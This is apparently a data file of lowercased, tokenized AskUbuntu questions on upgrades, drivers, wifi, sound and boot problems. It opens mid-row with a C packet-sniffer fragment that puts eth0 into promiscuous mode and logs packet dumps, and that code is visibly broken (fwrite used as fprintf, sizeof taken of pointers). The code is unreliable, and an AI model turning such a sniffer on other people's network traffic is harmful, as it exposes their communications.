struct udphdr *udph = ( struct udphdr* ) ( buffer + iphdrlen + sizeof ( struct ethhdr ) ) ; int header_size = sizeof ( struct ethhdr ) + iphdrlen + sizeof udph ; fwrite ( logfile , `` \n\n***********************udp packet*************************\n '' ) ; print_ip_header ( buffer , size ) ; fwrite ( logfile , `` \nudp header\n '' ) ; fwrite ( logfile , `` |-source port : % d\n '' , ntohs ( udph- > source ) ) ; fwrite ( logfile , `` |-destination port : % d\n '' , ntohs ( udph- > dest ) ) ; fwrite ( logfile , `` |-udp length : % d\n '' , ntohs ( udph- > len ) ) ; fwrite ( logfile , `` |-udp checksum : % d\n '' , ntohs ( udph- > check ) ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` ip header\n '' ) ; printdata ( buffer , iphdrlen ) ; fwrite ( logfile , `` udp header\n '' ) ; printdata ( buffer+iphdrlen , sizeof udph ) ; fwrite ( logfile , `` data payload\n '' ) ; //move the pointer ahead and reduce the size of string printdata ( buffer + header_size , size - header_size ) ; fwrite ( logfile , `` \n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # '' ) ; } void print_icmp_packet ( unsigned char* buffer , int size ) { unsigned short iphdrlen ; struct iphdr *iph = ( struct iphdr * ) ( buffer + sizeof ( struct ethhdr ) ) ; iphdrlen = iph- > ihl * 4 ; struct icmphdr *icmph = ( struct icmphdr * ) ( buffer + iphdrlen + sizeof ( struct ethhdr ) ) ; int header_size = sizeof ( struct ethhdr ) + iphdrlen + sizeof icmph ; fwrite ( logfile , `` \n\n***********************icmp packet*************************\n '' ) ; print_ip_header ( buffer , size ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` icmp header\n '' ) ; fwrite ( logfile , `` |-type : % d '' , ( unsigned int ) ( icmph- > type ) ) ; if ( ( unsigned int ) ( icmph- > type ) == 11 ) { fwrite ( logfile , `` ( ttl expired ) \n '' ) ; } else if ( ( unsigned int ) ( icmph- > type ) == icmp_echoreply ) { fwrite ( logfile , `` ( icmp echo reply ) \n '' ) ; } fwrite ( logfile , `` |-code : % d\n '' , ( unsigned int ) ( icmph- > code ) ) ; fwrite ( logfile , `` |-checksum : % d\n '' , ntohs ( icmph- > checksum ) ) ; //fprintf ( logfile , `` |-id : % d\n '' , ntohs ( icmph- > id ) ) ; //fprintf ( logfile , `` |-sequence : % d\n '' , ntohs ( icmph- > sequence ) ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` ip header\n '' ) ; printdata ( buffer , iphdrlen ) ; fwrite ( logfile , `` udp header\n '' ) ; printdata ( buffer + iphdrlen , sizeof icmph ) ; fwrite ( logfile , `` data payload\n '' ) ; //move the pointer ahead and reduce the size of string printdata ( buffer + header_size , ( size - header_size ) ) ; fwrite ( logfile , `` \n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # '' ) ; } int gopromiscous ( ) { int fd ; struct ifreq eth ; fd = socket ( af_inet , sock_packet , htons ( 0x800 ) ) ; strcpy ( eth.ifr_name , `` eth0 '' ) ; ioctl ( fd , siocgifflags , & eth ) ; eth.ifr_flags |= iff_promisc ; ioctl ( fd , siocsifflags , & eth ) ; printf ( `` \n entered promiscuous mode successfully\n '' ) ; } void printdata ( unsigned char* data , int size ) { int i , j ; for ( i=0 ; i < size ; i++ ) { if ( i ! =0 & & i % 16==0 ) //if one line of hex printing is complete ... { fwrite ( logfile , `` `` ) ; for ( j=i-16 ; j < i ; j++ ) { if ( data [ j ] > =32 & & data [ j ] < =128 ) fwrite ( logfile , `` % c '' , ( unsigned char ) data [ j ] ) ; //if its a number or alphabet else fwrite ( logfile , `` . `` ) ; //otherwise print a dot } fwrite ( logfile , `` \n '' ) ; } if ( i % 16==0 ) fwrite ( logfile , `` `` ) ; fwrite ( logfile , `` % 02x '' , ( unsigned int ) data [ i ] ) ; if ( i==size-1 ) //print the last spaces { for ( j=0 ; j < 15-i % 16 ; j++ ) { fwrite ( logfile , `` `` ) ; //extra spaces } fwrite ( logfile , `` `` ) ; for ( j=i-i % 16 ; j < =i ; j++ ) { if ( data [ j ] > =32 & & data [ j ] < =128 ) { fwrite ( logfile , `` % c '' , ( unsigned char ) data [ j ] ) ; } else { fwrite ( logfile , `` . `` ) ; } } fwrite ( logfile , `` \n '' ) ; } } }
372344	unsupported dell ubuntu 11.10 wants to upgrade	dell seems to have loaded unsupported software specifically linux os like ubuntu 11.10 onto laptops and then dispatched the hardware to the customer without a care , how said customer would upgrade the os once it becomes unsupported , as the warnings subsequently read . any user have the experience to successfully navigate to a later/newer version of ubuntu os without crashing into the inevitable failure message ? dell , who no longer have an ubuntu support team offer no help , in short . so , anyone with some clear steps ?
372347	numpad behaves like arrow keys since upgrading to 13.10	on my samsung np305e5a-a05us laptop , the numpad , except for the 5 key , has started acting like the arrow keys ( 6 moves the cursor right , 8 moves the cursor up , etc ) . however , holding the fn key makes it work normally . numlock only toggles the 5 key .
372349	lenovo g400s sound card doesnt work	i have bought a lenovo g400s with a dolby advanced audio v2 and soon enough i 've installed ubuntu . but my surround sound does n't work . is it supported ? i have tried countless tutorials on the internet but none of them work . i have the latest kernel and latest ubuntu . more info : in that laptop i have a dolby advanced audio v2 surround speaker ( i believe that is ) . when i play any music my alsa card says that is playing but unfortunately no sound comes out . jack works fine though . i have tried to edit many config files related to alsa located in several question here in ask ubuntu without success . my hard info shows that :
372350	i got error when i am trying to install l2tp .. can any help me ..solve this issuse	root @ t-aspire-5742 : / # sudo ipsec verify checking your system to see if ipsec got installed and started correctly : version check and ipsec on-path [ ok ] linux openswan u2.6.37/k3.5.0-42-generic ( netkey ) checking for ipsec support in kernel [ ok ] saref kernel support [ n/a ] netkey : testing xfrm related proc values [ failed ] please disable /proc/sys/net/ipv4/conf/*/send_redirects or netkey will cause the sending of bogus icmp redirects ! [ failed ] please disable /proc/sys/net/ipv4/conf/*/accept_redirects or netkey will accept bogus icmp redirects [ ok ] checking that pluto is running [ ok ] pluto listening for ike on udp 500 [ ok ] pluto listening for nat-t on udp 4500 [ ok ] two or more interfaces found , checking ip forwarding [ failed ] checking for 'ip ' command [ ok ] checking /bin/sh is not /bin/dash [ warning ] checking for 'iptables ' command [ ok ] opportunistic encryption support [ disabled ]
372353	nvidia driver update causes unbootable system	i used ubuntu driver update manager to install the recommended driver . i ca n't get into the gui anymore , system hangs at terminal . i have read that there are terminal commands to purge the old drivers , but how do i get into a useful terminal , at this point ? thanks for the help .
372354	ca n't switch language in ubuntu 13.10 lock screen	i 'm using ubuntu 13.10 and have two keyboard layouts installed ( english and hebrew ) . if i forget the hebrew as active language and the computer locks , i ca n't switch it back to english in the lock screen , and i have to click on `` switch user '' as a workaround .
372358	how to convert xml to xls in linux	i want to convert books.xml file to books.xls file for the purpose of that xml file data is adding to my newspaper website . i need your help . please give me the correct answers .
372359	server or desktop for web development	i apologize ahead of time if this is a repeat question . i 'm a linux noob and want to use it for website development . i installed the server version and got a working lamp installed via the command line . however , i do n't see any web browser . how will i be able to view/test my site as i 'm developing if i ca n't install a major browser , e.g firefox , chrome , ie , etc . is the solution to use ubuntu desktop instead ? thanks !
372361	how can i install windows while ubuntu is already on my system ?	i have ubuntu 12.10 on my system and i want to install windows 7 . i tried it but ubuntu was not found on the system anymore so i had to install grub . when i installed the grub menu on ubuntu , windows created a hard disk in ntfs file but when i rebooted , windows did n't show up . i deleted all the windows files . now i want to re-install windows 7 once again but i do n't really know how to do that .
372362	skype 4.2.0.11 not working with dongle ( data card )	i have updated my ubuntu 13.04 to 13.10 . after that i have installed skype 4.2.0.11 . i use dongle ( data card ) to connect to internet . whenever i try to connect skype it showing 'skype can ' connect ' error . wired thing is , my skype is working cool if i connect to internet with wifi/lan/mobile . if i connect with my dongle ( data card ) or any other dongle ( data card ) , 'skype cant connect ' error will result . please help..
372363	what does `` r8169 : ca n't disable aspm ; os does n't have aspm control '' really mean ?	i have this message in syslog and dmesg output : r8169 0000:03:00.0 : ca n't disable aspm ; os does n't have aspm control is it a configuration problem or hardware issue ?
372367	update error dist parse	the error goes like this ; e : malformed line 51 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . the error come out just after command apt-get update need help ... newbie here .
372369	java -version still showing 1.6 even after installing 1.7	i am new to java and i installed jdk 7 using sudo apt-get install openjdk-7-jre but when i do java -version i get this java version `` 1.6.0_26 '' java ( tm ) se runtime environment ( build 1.6.0_26-b03 ) java hotspot ( tm ) server vm ( build 20.1-b02 , mixed mode ) how do i set it to 1.7 and also how do i set my compiler to 1.7 in eclipse ?
372374	broadcom bcm4313 ubuntu 13.10 connection time out	after upgrading to ubuntu 13.10 i keep getting connection timed out every few seconds at which point i have to disconnect and reconnect to the wifi network . the wifi card worked fine on 13.04 with the bcmwl-kernel-source installed but giving problems on 13.10 : *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : c0:14:3d : cc : c9 : c7 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.1.4 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f0500000-f0503fff how can i fix this ? thanks
372375	failed upgrade to ubuntu 13.10 !	okay so i went to upgrade to 13.10 and after some time went by my computer restarted.. i assumed since it need to due to the upgrade.. but once it came back on all that shows up is the desk top amd 2icons one for a game amd one for torrents . .. but nothing else ! ! ! ! i ca n't open anything i also have to toolbar on the top where the date amd time would be and no launcher on the side for my icon shortcuts i basically ca n't do anything ! any help would be awesome i ca n't even get terminal to open via cnt-alt-t
372377	ca n't connect to vpn on ubuntu 12.04	i 'm having a lot of trouble connecting to vpn . this used to work on my machine , but i recently did an update and it 's stopped working . i 'm not sure what the problem is . my question is how do i debug this ? i 'm not able to narrow it down to a specific problem . this is what i get when i tail the syslogs . would appreciate any help ! nov 6 23:42:52 meera networkmanager [ 1137 ] : < info > starting vpn service 'pptp ' ... nov 6 23:42:52 meera networkmanager [ 1137 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 6132 nov 6 23:42:52 meera networkmanager [ 1137 ] : < info > vpn service 'pptp ' appeared ; activating connections nov 6 23:42:52 meera networkmanager [ 1137 ] : < info > vpn plugin state changed : starting ( 3 ) nov 6 23:42:52 meera networkmanager [ 1137 ] : < info > vpn connection 'name vpn ' ( connect ) reply received . nov 6 23:42:52 meera pppd [ 6136 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . nov 6 23:42:52 meera pppd [ 6136 ] : pppd 2.4.5 started by root , uid 0 nov 6 23:42:52 meera chat [ 6139 ] : timeout set to 15 seconds nov 6 23:42:52 meera chat [ 6139 ] : abort on ( no carrier ) nov 6 23:42:52 meera chat [ 6139 ] : abort on ( no dialtone ) nov 6 23:42:52 meera chat [ 6139 ] : abort on ( error ) nov 6 23:42:52 meera chat [ 6139 ] : abort on ( no answer ) nov 6 23:42:52 meera chat [ 6139 ] : abort on ( busy ) nov 6 23:42:52 meera chat [ 6139 ] : abort on ( username/password incorrect ) nov 6 23:42:52 meera chat [ 6139 ] : send ( at^m ) nov 6 23:42:52 meera pptp [ 6138 ] : nm-pptp-service-6132 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated nov 6 23:42:52 meera chat [ 6139 ] : expect ( ok ) nov 6 23:42:52 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' nov 6 23:42:53 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply nov 6 23:42:53 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . nov 6 23:42:53 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' nov 6 23:42:54 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . nov 6 23:42:54 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 13077 ) . nov 6 23:42:54 meera pptp [ 6138 ] : nm-pptp-service-6132 warn [ decaps_hdlc : pptp_gre.c:231 ] : the ppp mode is synchronous , yet no pptp -- sync option is specified ! nov 6 23:43:07 meera chat [ 6139 ] : alarm nov 6 23:43:07 meera chat [ 6139 ] : failed nov 6 23:43:07 meera pppd [ 6136 ] : script chat -v -f /etc/ppp/chat-ztisp finished ( pid 6139 ) , status = 0x3 nov 6 23:43:07 meera pppd [ 6136 ] : connect script failed nov 6 23:43:07 meera pppd [ 6136 ] : waiting for 1 child processes ... nov 6 23:43:07 meera pppd [ 6136 ] : script /usr/sbin/pptp 204.197.218.90 -- nolaunchpppd -- loglevel 0 -- logstring nm-pptp-service-6132 , pid 6138 nov 6 23:43:07 meera pptp [ 6138 ] : nm-pptp-service-6132 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error nov 6 23:43:07 meera pptp [ 6138 ] : nm-pptp-service-6132 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log nov 6 23:43:07 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) nov 6 23:43:07 meera pppd [ 6136 ] : script /usr/sbin/pptp 204.197.218.90 -- nolaunchpppd -- loglevel 0 -- logstring nm-pptp-service-6132 finished ( pid 6138 ) , status = 0x0 nov 6 23:43:07 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' nov 6 23:43:07 meera pptp [ 6143 ] : nm-pptp-service-6132 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) nov 6 23:43:07 meera pppd [ 6136 ] : exit . nov 6 23:43:07 meera networkmanager [ 1137 ] : < warn > vpn plugin failed : 1 nov 6 23:43:07 meera networkmanager [ 1137 ] : < info > vpn plugin state changed : stopped ( 6 ) nov 6 23:43:07 meera networkmanager [ 1137 ] : < info > vpn plugin state change reason : 0 nov 6 23:43:07 meera networkmanager [ 1137 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active .
372378	system collapsed when deleting linux mint partition	i installed windows 7 and linux mint in my laptop , then i wanted to delete the linux mint partition so as to install a newer version of ubuntu but it resulted to system collapse , ,when i boot it tells me that error : no such partition . grub rescue >
372379	white blocking screen when put youtube in full-screen mode	i am using ubuntu 12.04 lts.. in most cases , when i put a video in a full screen on youtube ( i am not using html5 , i am using flash player ) , and when try to exit the full screen mode , i got my screen turned to a blocking white screen . this prevents me from doing anything on my box but restart from alt + f1 terminal . actually i do n't know where exactly to report this issue , so i put it here appreciating any help . ps : i could see this issue on 13.04 also .
372380	remote ssh root login with ubuntu 12.04	i 'm pretty much a novice with ubuntu , exploring . i have a vps server . i was able to set-up two pptp vpns with ubuntu 11.04 but now i 'd like to try my hand at a ipsec/l2tp connection . however , login into the server is an issue . with ubuntu 11.04 , in terminal , i do : ssh root @ ipaddress and enter password . voila . but with ubuntu 12.04 lst i can not . it does not work . i set a root password with the vps control panel so it should all be working ... any help ? this is what i 'm trying to get to : https : //raymii.org/s/tutorials/ipsec_l2tp_vpn_with_ubuntu_12.04.html
372382	how to use canon i-sensys mf3228 - alternative driver , usb router , cloud printer ?	since there seems to be no way to get canon i-sensys mf3228 multifunctional printer to work under linux , im exploring other options . a ) my router supports usb printing , if i connect printer to router , is the pc with linux be able to print through router to that printer ? b ) can anyone know alternative driver that will work with that specimen ? i can not try every driver in ubuntu database , i installed some drivers that gave support for mf series starting with 4 , but nearest and more distant drivers did not work . scanner works without drivers , just plug in , hooray linux ! c ) some browsers supports cloud printing , can this be helpful in some way ? thanks for everybody who shares theys experiences trying to work with unsupported printer under linux . k .
372383	ubuntu for my android mobile	i am using sony ericsson live with walkman ( wt19i ) can i install ubuntu touch in my mobile , if yes kindly tell me the procedure to flash ubuntu touch to my sony ericsson live with walkman ( wt19i ) thanks in advance
372391	ubuntu 13.10 install vmware 9.0	after i install the vmware workstation 9.0 , while when i want open the vm , there come the dialogue `` before you can run vmware , several modules must be complied and loaded into the running kernel cancel install '' , while i clicked the install button , nothing happened . when : sudo apt-get install linux-headers-3.11.0-12-generic sudo /usr/bin/vmware-modconfig -- icon=vmware-workstation -- appname=vmware come : cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/modconfig-t9k19t/vmci-only/linux/driver.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ _module_/tmp/modconfig-t9k19t/vmci-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-12-generic' make : *** [ vmci.ko ] error 2 make : leaving directory `/tmp/modconfig-t9k19t/vmci-only' failed to build vmci . failed to execute the build command . starting vmware services : virtual machine monitor done virtual machine communication interface failed vm communication interface socket family done blocking file system done virtual ethernet failed vmware authentication daemon done
372392	how to boot into windows 7 through grub commands	i have an acer aspire 5732z series and it 's hard disk stopped working . i did lots of stuff to repair it . anyway long story short in the end ( when i had ubuntu ) i decided to get win7 . but when i downloaded win 7 and deleted ubuntu i then while rebooting i got an error . unknown filesystem rescue mode grub > my question is how do i boot into win7 now . i even have a win 7 dvd so i can do stuff in cdma prompt also .
372393	how to recover virus infected files from pendrive in ubuntu	i need to recover my pictures and files from a pendrive . i used the pendrive in windows yesterday to download a file . after that when i inserted the pendrive in ubuntu , it was only showing the trash file , no other files were there . please help me to recover my files .
372396	can not install apps from the software centre	every time i install apps from the software center i get an error message which says software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.140 ' } ) : org.debian.apt.install-or-remove-packages update : logged in and out and it seems to work now screenshot
372397	windows dual ubuntu startup 12.04	using windows xp . used dual boot . it got stuck at startup . got error message 255 memory for 256mb required . i went ahead anyway . using a gateway with 256 memory . do i need to install more memory for the one missing mb ? is there a fix for this ?
372398	keyboard shortcut to switch between windows within an application	is there a keyboard shortcut , or can i somehow bind a shortcut , to switch between windows within an application , similar to ( [ opt ] + [ ~ ] on osx ) ? ideally , i 'd like alt-tab to be un-affected , or to be rebound to switch between applications ( not between windows ) .
372401	openchrome and xubuntu	ecs model : p4m800pro-m2 pentium 4 cpu card : via cn700/p4m800 pro/p4m800 ce/vn800 graphics [ s3 unichrome pro ] xubuntu 13.04 is ok fine . xubuntu 13.10 in liveusb have black screen no tty . in boot i see installer.after install and boot black screen no tty . how install drivers openchrome ?
372402	eclipse unable to recognize classes in build path	so i created a new project in eclipse and added a few jar files in the project 's build path . for some reason eclipse is not recognizing any classes from the jars added to the build path . i googled the problem but did n't found a related problem . can anybody suggest what 's going on in my eclipse . i am using eclipse 3.8 on ubuntu 13.10 .
372405	how to safely and painlessly switch from kubuntu to lubuntu ?	i 've had kubuntu installed for several years , updating from one major release to another , and now i think i 'd like to try to switch to lubuntu . but since my distribution is already tuned and shaped to satisfy my needs , i 'd like not to get a fresh installation , but just purge kubuntu-desktop and install lubuntu-desktop . but when i execute sudo apt-get install lubuntu-desktop , it gives me an error of the following essence : the following packages have unmet dependencies : lubuntu-desktop : depends : usb-modeswitch but it is not going to be installed e : unable to correct problems , you have held broken packages . so , i investigate the modeswitch problem and get the following packages have unmet dependencies : usb-modeswitch : depends : usb-modeswitch-data ( > = 20110227-1~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . but : reading state information ... done usb-modeswitch-data is already the newest version . so , my question is : what actions should i take in order to obtain a clean and fresh installation of lubuntu ? and also , how do i safely remove all the kubuntu-desktop-related stuff ?
372406	unneeded raid recovery	i have two software raid 5s . today when i turned on my server ( after it was off for two weeks when i was on vacation ) , i got the message that the software raid is degraded and was offered raid recovery console or boot degraded . no idea what to do in that recovery console btw , so i just exited it . after the boot finished normally i took a peak at /proc/mdstat but there is nothing amiss there . so i took a look at mdadm -- detail /dev/md0 ( and md1 ) and again everything looks fine with failed devices being 0 both times . next i took a look at smartctl -- alll /dev/sdx for all of the drives and reallocated_sector_ct is 0 . ( lots of other zeros , all numbers look to me fine ) anybody have any ideas why i 'm getting the raid recovery message on boot when nothing seems bad ? server is custom built ubuntu server 13.04 with harddrives : 3* wdc wd30ezrx ( md0 ) 4* wdc wd15ears ( md1 )
372409	no sound/audio after resuming from sleep	i 've made a fresh uefi install of ubuntu 13.10 ( 64 bit ) on a lenovo ideapad z510 laptop with intel i5 4200m processor . ubuntu is the only os installed on the computer , secure boot disabled . everythings works fine ( backlight issue fixed after editing rc.local file ) , the only minor trouble i have is resuming the laptop from `` sleep '' mode . if i close the lid and then wake the laptop opening it again , there is no audio/sound . i need to restart the computer ( not even logging out helps ) . if i suspend the computer in a graphical way ( not closing the lid ) : gearwheel in top right of the screen -- suspend and wake it up/turning on , audio works with no issues . ideas how to fix this ? thanks !
372412	problem in installation in my hp g4 1226se	my hp laptop which series and model name is hp pavilion g4 1226se . windows 7 home basic 64 bit is already installed in my laptop . now i want to install ubuntu 12.04 lts or 13.10 lts . i have try many time to install in my laptop via live cd or usb installer , and i have try many live cd and many pendrive to install ubuntu , but it is not done , now i am in very big problem . when i put my cd or usb drive to boot and install the ubuntu , my laptop screen is goes the some black ( brightness of my laptop screen is very low and there is very low visibility ) and not showing any thing on my laptop screen , and when i move the my laptop screen , then there is graphics option in this screen to installation of the ubuntu option , and when i press the dual boot with setting button and press to continue them my laptop is goes for shutdown after 2 or 5 minutes . and hp service center person is saying to me our laptop hardware has no problem . please contact to ubuntu tech support . my laptop configuration is here . hardware product name g4-1226se product number qj551ea microprocessor 2.4 ghz intel core i5-2430m microprocessor cache 3 mb l3 cache memory 4 gb ddr3 memory max upgradeable to 4 gb ddr3 video graphics intel hd 3000 ( up to 1.65 gb ) display 35,5 cm ( 14,0 '' ) high-definition led-backlit brightview display ( 1366 x 768 ) hard drive 500 gb sata ( 5400 rpm ) multimedia drive supermulti dvdâąr/rw with double layer support network card integrated 10/100 base-t ethernet lan wireless connectivity 802.11 b/g/n sound altec lansing speakers keyboard full size island-style keyboard with home roll keys pointing device touchpad supporting multi-touch gestures with on/off button pc card slots multi-format digital media card reader for secure digital cards , multimedia cards external ports 1 vga 1 headphone-out 1 microphone-in 3 usb 2.0 1 rj45 dimensions 34.1 x 23.1 x 3.56 cm weight starting at 2.1 kg power 65w ac power adapter 6-cell lithium-ion ( li-ion ) webcam with integrated digital microphone ( vga ) operating system : windows 7 home basic 64bit
372416	dash search does not show applications	since the upgrade ( actually a fresh install ) to 13.10 , many times , when i open dash and search for an application i only get results for files and folders . sometimes i get some applications but not others . i have n't found a pattern to replicate the issue 100 % . if i open the application lens and search again , it works as it should . so many times , to launch an application , i have to use the super + a key combination to open the application scope instead of the simply the super key . it is annoying . did anyone have the same issue ? i searched for bugs on launchpad but did n't find any . i did n't open a bug report yet because it is not clear how to reproduce the problem faithfully . even more importantly , does anyone have a solution to this issue ?
372420	is it possible to upgrade to a new version via terminal ?	i 've noticed on a acer travelmate 5720 , that runs ubuntu 13.04 , it does n't show or pickup the latest 13.10 version . i did check die update settings and it is set pickup/show the latest updates . but with the necessary settings set , it does n't pickup the latest version . and it does have access to full free internet . is there some solutions ? or can i update via terminal ?
372421	tried to update phpmyadmin , but got `` kept back ''	# apt-get update ... updates from repo # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : phpmyadmin 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . why does ubuntu say so ? how can i upgrade it via apt-get upgrade ? note : phpmyadmin version is 3.5.8.1deb1.precise~ppa.2
372424	vaio e series brighness problem	i am a complete new to ubuntu and trying to learn things here.so , i have installed ubuntu 13.04 on my vaio vpceh25en and facing the following issues : - 1.i can not press any buttons on the login screen of ubuntu ( like the power button on top right etc . ) .i can just login . 2.i can not change the screen brightness either by fn keys or through settings , though the display brightness icon used to appear when i tried to change the brightness but it is also no longer appearing after i changed some settings following some threads from askubuntu . 3.i can not use side scroll feature of my touchpad . please help me with these issues ! ! ! thanks
372425	after upgrade to ubuntu 13.10 bluetooth mouse not working when waking up from suspend , how can it be solved ?	as the topic says , while using ubuntu 13.04 i had no problem and when the computer woke up from suspend mode the mouse would work automatically without me doing anything . since the upgrade to 13.10 i need to manually go to the bluetooth icon in the panel , select the mouse and click the connection again even though it 's marked as operating . any idea how to solve this issue ? thanks !
372426	no sound or devices in pulseaudio	i have been having some problems with my sound recently . i have no sound , and also , no options to select an output device . please see the attached images which describe this problem . if i type pulseaudio -k into a terminal , i get the following output : e : [ pulseaudio ] main.c : failed to kill daemon : no such process running start-pulseaudio-x11 has no effect . any help would be much appreciated !
372428	display name for deb package in ubuntu software center	suppose i have a package mypack_1.1.0_i386.deb . when i open it via ubuntu software center it displays `` mypack '' as a display name . obviously it gets the name from the `` package : '' attribute of the 'control ' file from the package . but there are packages with short package name in `` package : '' attribute and more verbose display name in ubuntu software center . is it possible to specify somewhere verbose display name for my package ? or for those packages usc get the display name from some internet database somehow ? i tried to use multiline `` description : '' field in config file but this does n't help .
372432	how to change the default us keyboard to a hungarian keyboard	i already added hungarian as a language , but in the keyboard menu settings i do n't see any other keyboard available to add or set . i do n't want to change the default system language , just the keyboard , and i do n't want to change the layout manually key by key . i 'm using 12.04.3 lts .
372434	13.04 ethernet disconnects after laptop goes to sleep	i have an asus f502c laptop that works great with ubuntu , except for the fact that i lose ethernet when my computer goes to sleep , and nothing i do , short of rebooting , can get the internet back . i 've tried replugging the ethernet cable from both ends , i 've tried everything suggested here , and still have no idea what 's going on . i struggled to put the unload_modules files ( there 's no obvious way to give myself admin permission in the gui , so i had to do some serious dicking around in the terminal ) . the only hint i 've got is that i might have an ethernet driver that ubuntu does n't like . 03:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) subsystem : asustek computer inc. device 201f flags : bus master , fast devsel , latency 0 , irq 19 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at e000 [ size=128 ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] express endpoint , msi 00 capabilities : [ c0 ] msi : enable- count=1/16 maskable+ 64bit+ capabilities : [ d8 ] msi-x : enable+ count=16 masked- capabilities : [ 100 ] advanced error reporting capabilities : [ 180 ] device serial number ff-e9-e5-05-74-d0-2b-ff kernel driver in use : alx
372435	downloads never start	i have tried to download several times from the download page and it never starts , just hangs . the download `` now '' link is http : //www.ubuntu.com/start-download ? distro=desktop & bits=64 & release=lts . is there any other location i can use ?
372436	disconnected from wireless network	i purchased a new system dell inspirion15 with ubuntu 12.04 os . everything was fine , then suddenly my wifi connection went off . i do not see the signal strength on the wifi symbol nor any options for available networks which are present . the fn+f2 option switches on/off the bluetooth but no effect on the wifi . i do not have any other external option for wifi settings . i have tried the following : $ rfkill list soft blocked : no hard blocked : no $ rm -r ~/.config/ ~/.cache/ and restarted my system but no use . $ sudo /etc/init.d/network-manager restart no use either . hoping for some suggestions .
372440	which apps run on ubuntu	i 've just discovered ubuntu and like the thought of getting away from microsoft . i an currently running microsot xp and have accumulated a good many apps . my question is : do any apps which are designed for xp run under ubuntu ? i read the answer to 'is it possible to run windows 8 apps in ubuntu ' and , frankly , got lost in the jargon . does this mean that ubuntu is really a developers language and is not suitable for the average user ? jim
372443	networking not starting - openvz default ubuntu 12.04 template	i have been using hypervm to deploy openvz ubuntu 12.04 server instances . unfortunately , they all boot without networking enabled . i tried inserting int the crontab : @ reboot /usr/sbin/service networking restart but this did n't work . running this command ( without @ reboot ) from the cli will result in the network starting and being able to use commands like ifconfig so i get the feeling it is just a matter of the cron being called too soon ? what is the best practice for resolving the issue . i am guessing something along the lines of adding an upstart job ?
372444	wireless connection does n't work automatically	i tried to connect to the wifi with the gui and it works flawless . it connect automatically on boot . when i tried the /etc/network/interfaces way , it does n't . it does connect to the wifi and ping google.com result something like this 64 bytes from 120.28.26.30 : icmp_req=3 ttl=56 time=26.3 ms the problem is that rebooting the laptop and the wifi will not start automatically , i even uninstalled networkmanager to be sure . it even caused about a two minute boot delay saying something like this : waiting for network configuration it works after i login and first executed ifdown -a and ifup -a as root . i can surf the net after that , but why it does n't work on boot time ? my /etc/network/interfaces : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp wpa-ssid wifi wpa-psk passwordqazx
